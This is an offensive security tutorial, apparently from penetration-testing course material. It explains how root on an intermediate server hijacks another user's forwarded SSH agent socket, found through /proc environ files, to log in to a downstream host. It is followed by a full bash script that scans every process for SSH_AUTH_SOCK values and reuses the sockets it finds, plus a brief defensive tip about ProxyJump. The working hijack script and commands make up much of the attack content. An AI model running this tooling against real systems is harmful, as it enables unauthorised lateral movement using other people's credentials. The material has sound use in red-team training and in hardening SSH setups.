Hijacking Using SSH-Agent

SSH-Agent is a utility that holds a user's decrypted private keys in memory and answers signing requests for them, so the passphrase is not re-entered on every connection. With agent forwarding, that signing service is exposed through a Unix socket on each intermediate host, which is exactly what makes the hijack below possible.

First, generate a key pair on our Kali VM if we do not already have one:

ssh-keygen

For our SSH connections to work using SSH-Agent forwarding, we need to have our public key installed on both the intermediate server and the destination server. In our case, the intermediate server will be the controller machine and the destination server will be linuxvictim.

We can copy our key to both of them using the ssh-copy-id command from our Kali VM, specifying our public key with the -i flag.

ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@controller
ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@linuxvictim

Set our local SSH config file in ~/.ssh/config on our Kali. With no Host line the option applies to every connection; in practice we would scope it to a Host block for the controller so that only that intermediate ever sees our agent.

ForwardAgent yes

Next, on the intermediate server, which in our case is the controller, we need to have the following line set in /etc/ssh/sshd_config

AllowAgentForwarding yes

On Kali, start an agent and load our private key into it (ssh-add prompts for the passphrase once):

eval `ssh-agent`
ssh-add

Now that our key is registered with the agent, connecting to the downstream server takes a pair of ssh commands. We'll first ssh to the controller and then from there to the linuxvictim host. The second hop authenticates through the forwarded agent socket on the controller, so no private key ever needs to exist there.

ssh offsec@controller
ssh offsec@linuxvictim

Leverage the victim user's open socket directly. From an elevated shell on the controller, first locate the victim's active SSH session (the sshd child process for offsec and the shell beneath it):

ps aux | grep ssh
pstree -p offsec | grep ssh

The SSH_AUTH_SOCK environment variable tells ssh and ssh-add where the agent's socket file is located. The victim's session carries it in its environment (readable as root from /proc/<pid>/environ for the PID found above), and it points at the forwarded socket in /tmp:

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380

As an elevated user (root on the controller), we can export the same SSH_AUTH_SOCK value in our own shell and use the victim's agent socket as if it were our own: ssh-add -l should then list the victim's key fingerprints, and ssh offsec@linuxvictim authenticates with a key we never see, because the agent on Kali signs the challenge for anyone who can reach the socket. This only works while the victim's forwarded session stays open; once it closes the socket is removed. From the defensive side, the lesson is to forward the agent only to hosts you fully trust, or to avoid forwarding altogether and hop via ProxyJump (ssh -J controller offsec@linuxvictim), which carries the authentication end-to-end without ever exposing the agent on the intermediate host.
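The socket hunt described above, as an added example that is not part of the original page: a bash script that reads SSH_AUTH_SOCK out of process environments in a /proc-style tree (as root on the controller, since other users' /proc/<pid>/environ are otherwise unreadable), then reuses a chosen socket with ssh-add and ssh. The function names, the --scan flag and the sample PID and socket path in the comments are assumptions made for the example.

```bash
#!/bin/bash
# Added example, not from the original page: locate forwarded ssh-agent sockets on the
# intermediate host by reading SSH_AUTH_SOCK out of process environments, then reuse one.
# Requires root on the host (other users' /proc/<pid>/environ are unreadable otherwise).
# The PID 16380 and socket path mentioned in comments are illustrative only.

# Print the SSH_AUTH_SOCK value stored in a NUL-separated environ file such as
# /proc/<pid>/environ; prints nothing if the process has no agent socket.
auth_sock_from_environ() {
    tr '\000' '\n' < "$1" | sed -n 's/^SSH_AUTH_SOCK=//p' | head -n 1
}

# Walk a /proc-style tree ($1, default /proc) and print "<pid> <socket>" for every
# process whose environment carries SSH_AUTH_SOCK. A victim's forwarded agent shows up
# on their sshd session and every shell beneath it, so the same socket can repeat.
find_agent_sockets() {
    local proc_root="${1:-/proc}" d pid sock
    for d in "$proc_root"/[0-9]*; do
        [ -r "$d/environ" ] || continue
        pid="${d##*/}"
        sock="$(auth_sock_from_environ "$d/environ")"
        [ -n "$sock" ] && printf '%s %s\n' "$pid" "$sock"
    done
    return 0
}

# Reuse a hijacked socket: confirm the victim's agent answers (ssh-add -l lists the
# fingerprints it holds) and then open an ssh session that authenticates through it.
# No private key is read or copied; the agent signs the challenge for us while the
# victim's forwarded session stays open. Fails early if the path is not a live socket.
use_agent() {
    local sock="$1"; shift
    [ -S "$sock" ] || { echo "not a socket: $sock" >&2; return 1; }
    SSH_AUTH_SOCK="$sock" ssh-add -l || return 1
    SSH_AUTH_SOCK="$sock" ssh "$@"
}

# Run with --scan to list every live agent socket on this host and the keys behind it:
#   sudo ./agent_hijack.sh --scan
# then, for a socket of interest (hypothetical path):
#   use_agent /tmp/ssh-7OgTFiQJhL/agent.16380 offsec@linuxvictim
if [ "${1:-}" = "--scan" ]; then
    find_agent_sockets /proc | sort -u -k2 | while read -r pid sock; do
        echo "pid $pid -> $sock"
        SSH_AUTH_SOCK="$sock" ssh-add -l 2>/dev/null || echo "  agent not reachable"
    done
fi
```

The scan dedupes on the socket path because every process in the victim's session tree inherits the same SSH_AUTH_SOCK; ssh-add -l against each candidate is the cheap check that the agent on the far end is still alive before spending a connection attempt on it.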
